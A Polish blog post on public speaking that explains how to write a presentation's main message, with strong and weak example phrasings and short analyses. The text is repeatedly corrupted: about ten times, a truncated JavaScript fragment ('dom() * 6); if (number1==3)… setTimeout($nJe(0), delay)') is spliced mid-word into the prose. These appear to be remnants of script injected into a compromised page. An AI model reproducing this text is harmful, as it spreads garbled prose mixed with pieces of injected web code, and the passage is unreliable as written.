Najważniejsze zdanie Twojej prezentacji

Jak sprawić aby uczestnicy Twojej prezentacji zapamiętali z niej dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, co najważniejsze? Opracuj Twój Główny Przekaz, czyli zapadający w pamięć mocny, zwięzły zwrot, dzięki któremu słuchacze będą podążać cały czas za Twoim dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokiem myślenia. To ma być zdanie (lub dwa), które  przyjdą im do głowy, gdy kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś nazajutrz zapyta przy audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomacie z kawą: “I o czym tam wczoraj była mowa na prezentacji?”

Aby opracować Główny Przekaz  jasno określ cel swojego wystąpienia. Postaraj się odpowiedzieć sobie na trzy pytania:

Co chcesz aby zapamiętali?
Co chcesz aby zrobili?
Co ma się zmienić po Twojej prezentacji?

Główny Przekaz dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to najważniejsza myśl, którą słuchacze mają zapamiętać z Twojego wystąpienia.

Musi on mieć kilka cech

1. Dotyczyć bezpośrednio ludzi, którzy Ciebie słuchają. To dobry sposób aby go zapamiętali

Przykład mocnego głównego przekazu:
” Jesteście najlepszym zespołem w regionie. To Wy pokażecie wszystkim, jak osiągnąć najwyższe wyniki. To dla mnie wielka radość i zaszczyt kierować waszym zespołem”
Odom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to słaby główny przekaz:
“Chcę aby Wasz zespół był najlepszy w regionie. Osiągniemy dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to za wszelką cenę. Jako wasz lider, dopilnuję tego”

Analiza: dobry. mocny przekaz dotyczy publiczności a słaby dotyczy mówcy.

2. Powinien być bezpośredni, mocny i prosty, a przy tym musi zawierać w sobie korzyść dla słuchaczy

Mocny przekaz:
“Jeśli poprzecie ten kierunek rozwoju naszych działań marketingowych, zapewnicie firmie dobry i dochodowy rok, wasi klienci będą zadowoleni a do waszych portfeli trafi więcej pieniędzy”.
Słaby główny przekaz:
“Jestem pewien, że po usłyszeniu wszystkich faktów, podejmiecie właściwą decyzję w sprawie proponowanego przeze mnie kierunku rozwoju naszych działań marketingowych”.

Analiza: mocny główny przekaz jest bezpośredni i pozytywny. Słaby zaś zawiera słowa: “Jestem pewien, że podejmiecie właściwą decyzję” które są niekonkretne i brzmią protekcjonalnie.

3. Powinien być ofensywny, nigdy defensywny

Mocny Główny Przekaz:
“Nasz zespół wykonał świetną robotę, aby projekt mógł być wdrożony w produkcję na czas, mimo różnego rodzaju problemów i braku pomocy ze strony kolegów z innych działów”.
Słaby przekaz:
“Nie zgadzam się z zarzutami stawianymi nam przez inne działy – że zawiedliśmy naszą firmę. To nie z naszego powodu mamy opóźnienia w realizacji tego projektu”

Analiza: pierwszy przekaz jest mocny i podnoszący na duchu. Drugi zawiera słowa “zawiedliśmy naszą firmę”. To nigdy nie brzmi pozytywnie.

4. Powinien wzywać do podjęcia działania

Twoja publiczność zadaje sobie pytanie: czego on/ona od nas oczekuje? Powiedz im dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to!

Mocny Główny Przekaz:
“Jedynym sposobem by zapewnić nam sukcesy w najbliższych latach, jest badanie co sześć miesięcy zmian zachodzących w dziedzinie księgowości w związku z rozwojem oprogramowania”.
Słaby przekaz:
Zmiany zachodzące w dziedzinie księgowości pod wpływem rozwoju oprogramowania będą miały długofalowe skutki”.

Analiza: mocny przekaz pokazuje ludziom kierunek a słaby nie wyjaśnia publiczności czego od niej oczekujemy.

Dalsze informacje:

Wokół Twojego Głównego Przekazu powinna “kręcić się” cała prezentacja. Dopiero po opracowaniu tej najważniejszej myśli, przystępujesz do pisania całego wystąpienia. Zastanów się jakie argumenty będą wspierać Twój Główny Przekaz (najlepiej aby były dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to trzy argumenty). Aby ułatwić słuchaczom zapamiętanie tego, co najważniejsze, powiedz swój główny przekaz na początku wystąpienia i koniecznie powtórz na koniec!

Przykłady różnych przekazów zaczerpnąłem z książki do księgarni dobreksiazki.pl)

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply